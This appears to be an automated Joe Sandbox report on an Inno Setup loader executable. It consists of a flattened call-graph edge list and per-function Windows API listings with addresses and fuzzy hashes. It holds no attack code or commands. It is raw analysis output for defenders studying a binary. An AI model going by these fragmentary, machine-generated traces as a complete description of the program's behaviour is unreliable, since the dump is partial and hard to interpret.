API calls 6498->6501 6500 4059b0 33 API calls 6499->6500 6500->6498 6502 405ab8 6501->6502 6503 403154 4 API calls 6502->6503 6504 405ac6 6503->6504 6504->6484 5916 40a9de 5917 40aa03 5916->5917 5918 407918 InterlockedExchange 5917->5918 5919 40aa2d 5918->5919 5920 40aa3d 5919->5920 5921 409ae8 18 API 
calls 5919->5921 5926 4076ac SetEndOfFile 5920->5926 5921->5920 5923 40aa59 5924 4025ac 4 API calls 5923->5924 5925 40aa90 5924->5925 5927 4076c3 5926->5927 5928 4076bc 5926->5928 5927->5923 5929 40748c 35 API calls 5928->5929 5929->5927 6847 402be9 RaiseException 6848 402c04 6847->6848 6515 402af2 6516 402afe 6515->6516 6519 402ed0 6516->6519 6520 403154 4 API calls 6519->6520 6522 402ee0 6520->6522 6521 402b03 6522->6521 6524 402b0c 6522->6524 6525 402b25 6524->6525 6526 402b15 RaiseException 6524->6526 6525->6521 6526->6525 5454 40a5f8 5497 4030dc 5454->5497 5456 40a60e 5500 4042e8 5456->5500 5458 40a613 5503 40457c GetModuleHandleA GetProcAddress 5458->5503 5462 40a61d 5511 4065c8 5462->5511 5464 40a622 5520 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5464->5520 5471 40a665 5542 406c2c 5471->5542 5475 4031e8 18 API calls 5476 40a683 5475->5476 5556 4074e0 5476->5556 5482 407918 InterlockedExchange 5484 40a6d2 5482->5484 5483 40a710 5576 4074a0 5483->5576 5484->5483 5613 409ae8 5484->5613 5486 40a751 5580 407a28 5486->5580 5487 40a736 5487->5486 5488 409ae8 18 API calls 5487->5488 5488->5486 5490 40a776 5590 408b08 5490->5590 5494 40a7bc 5495 408b08 35 API calls 5494->5495 5496 40a7f5 5494->5496 5495->5494 5623 403094 5497->5623 5499 4030e1 GetModuleHandleA GetCommandLineA 5499->5456 5501 403154 4 API calls 5500->5501 5502 404323 5500->5502 5501->5502 5502->5458 5504 404598 5503->5504 5505 40459f GetProcAddress 5503->5505 5504->5505 5506 4045b5 GetProcAddress 5505->5506 5507 4045ae 5505->5507 5508 4045c4 SetProcessDEPPolicy 5506->5508 5509 4045c8 5506->5509 5507->5506 5508->5509 5510 404624 6F561CD0 5509->5510 5510->5462 5624 405ca8 5511->5624 5521 4090f7 5520->5521 5708 406fa0 SetErrorMode 5521->5708 5524 407284 19 API calls 5525 409127 5524->5525 5526 403198 4 API calls 5525->5526 5527 40913c 5526->5527 5528 409b78 GetSystemInfo VirtualQuery 5527->5528 5529 409ba2 5528->5529 5530 409c2c 5528->5530 5529->5530 5531 409c0d VirtualQuery 
5529->5531 5532 409bcc VirtualProtect 5529->5532 5533 409bfb VirtualProtect 5529->5533 5534 409768 5530->5534 5531->5529 5531->5530 5532->5529 5533->5531 5714 406bd0 GetCommandLineA 5534->5714 5536 409850 5537 4031b8 4 API calls 5536->5537 5539 40986a 5537->5539 5538 406c2c 20 API calls 5541 409785 5538->5541 5539->5471 5606 409c88 5539->5606 5540 403454 18 API calls 5540->5541 5541->5536 5541->5538 5541->5540 5543 406c53 GetModuleFileNameA 5542->5543 5544 406c77 GetCommandLineA 5542->5544 5545 403278 18 API calls 5543->5545 5552 406c7c 5544->5552 5546 406c75 5545->5546 5550 406ca4 5546->5550 5547 406c81 5548 403198 4 API calls 5547->5548 5551 406c89 5548->5551 5549 406af0 18 API calls 5549->5552 5553 403198 4 API calls 5550->5553 5554 40322c 4 API calls 5551->5554 5552->5547 5552->5549 5552->5551 5555 406cb9 5553->5555 5554->5550 5555->5475 5557 4074ea 5556->5557 5721 407576 5557->5721 5724 407578 5557->5724 5558 407516 5559 40752a 5558->5559 5560 40748c 35 API calls 5558->5560 5563 409c34 FindResourceA 5559->5563 5560->5559 5564 409c49 5563->5564 5565 409c4e SizeofResource 5563->5565 5566 409ae8 18 API calls 5564->5566 5567 409c60 LoadResource 5565->5567 5568 409c5b 5565->5568 5566->5565 5570 409c73 LockResource 5567->5570 5571 409c6e 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5573 409c84 5570->5573 5574 409c7f 5570->5574 5572 409ae8 18 API calls 5571->5572 5572->5570 5573->5482 5573->5484 5575 409ae8 18 API calls 5574->5575 5575->5573 5578 4074b4 5576->5578 5577 4074c4 5577->5487 5578->5577 5579 4073ec 34 API calls 5578->5579 5579->5577 5581 407a35 5580->5581 5582 405890 18 API calls 5581->5582 5583 407a89 5581->5583 5582->5583 5584 407918 InterlockedExchange 5583->5584 5585 407a9b 5584->5585 5586 405890 18 API calls 5585->5586 5587 407ab1 5585->5587 5586->5587 5588 405890 18 API calls 5587->5588 5589 407af4 5587->5589 5588->5589 5589->5490 5592 408b39 5590->5592 5596 408b82 5590->5596 5591 408bcd 5727 407cb8 5591->5727 5594 4034f0 18 API calls 

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                              • String ID:
                                                              • API String ID: 2441996862-0
                                                              • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                              • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                              • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                              • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                              • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                              • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                              • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                              Control-flow Graph

                                                              APIs
                                                              • SetLastError.KERNEL32 ref: 0040AAC1
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02101D74), ref: 0040966C
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                              • SetWindowLongA.USER32(00010452,000000FC,00409960), ref: 0040AB15
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                              • DestroyWindow.USER32(00010452,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 3757039580-3001827809
                                                              • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                              • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                              • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                              • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                              • SetWindowLongA.USER32(00010452,000000FC,00409960), ref: 0040AB15
                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000), ref: 00409A70
                                                                • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8), ref: 00409AA4
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                              • DestroyWindow.USER32(00010452,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 3586484885-3001827809

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000), ref: 00409A70
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                              • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8), ref: 00409AA4
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02101D74), ref: 0040966C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                              • String ID: D
                                                              • API String ID: 3356880605-2746444292

                                                              Control-flow Graph

                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 730355536-0

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003

                                                              Control-flow Graph

                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0

                                                              Control-flow Graph

                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 296031713-0

                                                              Control-flow Graph

                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0

                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                              Control-flow Graph (the executed / not-executed block colouring does not survive extraction)
                                                              • Basic blocks: 448 = 40762c-40764a (ReadFile); 449 = 407663-40766a; 450 = 40764c-407650; 451 = 407652-40765a (GetLastError); 452 = 40765c-40765e (call 40748c)
                                                              • Edges: 448->449, 448->450, 450->451, 450->452, 451->449, 451->452, 452->449
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastRead
                                                              • String ID:
                                                              • API String ID: 1948546556-0
                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                              Memory Dump Source
